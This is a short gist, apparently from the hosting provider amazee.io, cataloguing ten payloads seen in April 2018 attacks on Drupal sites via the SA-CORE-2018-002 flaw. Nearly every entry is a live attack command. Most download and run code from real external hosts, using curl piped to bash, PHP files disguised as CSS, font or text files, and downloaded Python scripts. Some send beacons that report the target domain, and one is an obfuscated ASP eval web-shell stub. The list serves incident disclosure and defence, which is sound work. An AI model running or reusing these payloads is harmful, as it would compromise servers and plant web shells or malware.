@Schnitzel
Last active April 16, 2018 19:40
Drupal SA-CORE-2018-002 attacks

Drupal SA-CORE-2018-002 attacks on amazee.io

Attack 1

First seen: April 13th 2018, 12:54:06

Array Key: #markup

Array Value:

curl -o config.php http://havio.pl/themes/themes.css

Attack 2

First seen: April 13th 2018, 04:07:38

Array Key: #markup

Array Value:

curl -s http://158.69.133.18:8220/logo8.jpg | bash -s

Attack 3

First seen: April 9th 2018, 02:07:00 UTC

Array Key: #

Array Value:

eval("Ex"&cHr(101)&"cute(""Server.ScriptTimeout=3600:On Error Resume Next:Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(""""bd=bd&chr(&H""""&c&"""")""""):Else:Execute(""""bd=bd&chr(&H""""&c&Mid(s,i+2,2)&"""")""""):i=i+2:End If""&chr(10)&""Next:End Function:Response.Write(""""->|""""):Ex"&cHr(101)&"cute(""""On Error Resume Next:""""&bd(""""44696D20533A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A496620457272205468656E3A533D224552524F523A2F2F2022264572722E4465736372697074696F6E3A4572722E436C6561723A456C73653A533D5365727665722E4D61707061746828222E2229266368722839293A466F722045616368204420696E20432E4472697665733A533D5326442E44726976654C657474657226636872283538293A4E6578743A456E642049663A526573706F6E73652E5772697465285329"""")):Response.Write(""""|<-""""):Response.End"")")

Attack 4

First seen: April 12th 2018, 18:26:52 UTC

Array Key: #markup

Array Value:

wget http://37.1.206.18/pingpongx?host=www.domain.com -O /dev/null

Attack 5

First seen: April 12th 2018, 18:26:52 UTC

Array Key: #markup

Array Value:

echo "ahcBmgweGC"

Attack 6

First seen: April 12th 2018, 23:38:53 UTC

Array Key: #markup

Array Value:

python -c 'exec("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".decode("base64"))'; curl -s 'http://80.209.253.51/?d=www.domain.com' >/dev/null; wget 'http://80.209.253.51/?d=www.domain.com' -O /dev/null

Attack 7

First seen: April 13th 2018, 02:29:26 UTC

Array Key: #markup

Array Value:

curl -s 'http://80.209.253.51/?d=www.domain.com' >/tmp/mjs.py; wget 'http://80.209.253.51/?d=www.domain.com' -O /tmp/mjs.py; python /tmp/mjs.py

Attack 8

First seen: April 13th 2018, 06:35:41 UTC

Array Key: #markup

Array Value:

curl -o rhRfU.php http://mmsubtitles.co/fonts/aril.ttf

Attack 9

First seen: April 13th 2018, 20:18:30

Array Key: #markup

Array Value:

wget -O m.php http://wp.startreceive.tk/test/z/m.txt;chmod 777 /tmp/m.php;sed -i 's/ptptpt/"\/home\/bpw\/public_html\/"/g' /tmp/m.php;php -f /tmp/m.php;rm -f /tmp/m.php

Attack 10

First seen: April 13th 2018, 20:00:29

Array Key: #markup

Array Value:

wget -O /dev/null http://146.185.136.136/knock.php?target=http://domain.com/